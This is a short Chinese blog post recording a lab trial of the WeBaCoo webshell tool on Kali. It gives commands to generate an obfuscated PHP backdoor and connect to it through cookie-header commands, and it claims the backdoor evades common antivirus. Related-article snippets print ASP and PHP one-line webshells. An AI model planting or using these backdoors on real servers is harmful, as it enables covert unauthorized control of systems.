2018-11-08 webacoo小试记录(kali)

最新推荐文章于 2022-07-31 21:42:43 发布
最新推荐文章于 2022-07-31 21:42:43 发布
阅读量106 收藏
点赞数
分类专栏: web安全渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42254735/article/details/101478049
版权

一. 简介:

获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。

参数:      查看帮助:webacoo -h

二. 使用记录:

webacoo -g -o webacoo.php      (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。)​

 
12321111-f181bd8d841a9306
 

至于如何上传到服务器本地不在此赘述了。

webacoo -t -u http://192.168.56.101/webacoo.php     (连接一句话木马,-t参数指定进行客户端的连接,-u参数指定目标URL。)

 
12321111-8e1b78a59c380d39
 

##抓包分析如何通过cookie头传指令,手动触发流量  【cm/cn/cp】

 
12321111-b42a6c76d9a5413d
 
昨天今天下雨天233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webacoo
qq_43776408的博客
09-29 463
WeBaCoo是一款隐蔽的脚本类Web后门工具,设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测),WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。 /////////////////////////////////// 生成服务端代码: webacoo -g -...
webshell管理-WeBaCoo和Weevely
weixin_41082546的博客
03-19 192
WeBaCoo (Web Backdoor Cookie) 简介 类终端的shell,只针对 PHP 编码通信内容通过 cookie 头传输,隐蔽性较强 Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~ cm:bash64 编码之后的命令 cn:服务器用于返回数据的 cookie 头的名 cp:返回信息定界符 生成服务器端 webacoo -g -o w...
Kali Linux Web后门工具、Windows操作系统痕迹清除方法
dichiji8804的博客
04-14 826
Kali Linux Web后门工具 Kaliweb后门工具一共有四款,今天只介绍WebaCoo 首先介绍第一个WeBaCooWeb Backdoor Cookie) WeBaCoo是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可在客户端和Web服务器之间实现执行代码的网页终端。WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这...
Web后门工具WeBaCoo
weixin_33701294的博客
09-11 179
2019独角兽企业重金招聘Python工程师标准>>> ...
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 877
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCooWeb Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2018.4-amd64 操作系统
12-19
kali-linux-2018.4-amd64 操作系统 网盘下载地址 确保资源可用
kali-linux-2023.3-vmware-amd64.part2.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-2018.3-amd64.iso
02-22
kali-linux-2018.3-amd64.iso
webacoowebshell
03-04
webacoowebshell,一个轻量级的phpshell,比较好用
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 541
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
2018-11 webacoo小试记录kali
昨天今天下雨天的博客
11-06 783
一. 简介: 获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。 参数: 查看帮助:webacoo -h 二. 使用记录webacoo -g -o webacoo.php (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。) webacoo -t -u http://...
关于Kali的两个Webshell(Webacoo和Weevely)的学习笔记
Mi1k7ea
03-15 6385
Webacoo和Weevely是在Kali中默认安装了的Webshell,下面将分开进行介绍。 Web Backdoor Cookie(Webacoo): Webacoo的编码通信内容都是通过cookie头传输,隐蔽性强。 其Cookie头中的三个变量: cm:base64编码的命令 cn:服务器用于返回数据的cookie头的名 cp:返回信息定界符 直接在终端输
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> php一句话木马: <?php @eval($_POS
webshell管理之中国菜刀 蚁剑 WeBaCoo Weevely
马赛克的博客
12-30 1万+
一:中国菜刀 中国菜刀是一款国产的网站管理软件,直接php,asp,aspx等脚本语言,简单来说通过菜刀连接上传到网站的一句话木马,可以控制 部分甚至全部权限,现在很多菜刀都有后门,小心使用。 一般情况下,可能会被IDS,WAF,等扫描软件查杀,可以通过各种编码去绕过 二:蚁剑 蚁剑是开源的跨平台的网站管理工具,中文手册链接:https://doc.u0u.us/zh-hans/gett...
【安全牛学习笔记】WEBSHELL
edu_aqniu的博客
09-30 1174
WEBSHELL                                           中国菜刀: http://www.maicaidao.co/                       可能被IDS、AV、WAF、扫描器软件发现查杀       WeBaCooWEB backdoor Cookie)                   
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3325
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
安装完kali的后的一些配置(教程集合)
cynthrial的博客
09-26 1421
安装完kali后的一些配置(教程集合) 替换更新源 + 安装中文输入法 https://blog.csdn.net/anjingshen/article/details/75909366 设置kali的快捷键 现在用的kali版本是rolling,基于debian 8(Jessie) 打开终端每次都去点就很不爽 在 设置→设备→键盘 中新建一个快捷键就好 名称:开启终端 命令:gnome-te...
awvs-kali-15.3
最新发布
04-30
AWVS-Kali-15.3是指Acunetix Web Vulnerability Scanner(AWVS)在Kali Linux 15.3版本上的安装和使用。AWVS是一款常用的Web应用程序漏洞扫描工具,用于检测和识别Web应用程序中的安全漏洞。 在Kali Linux 15.3上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值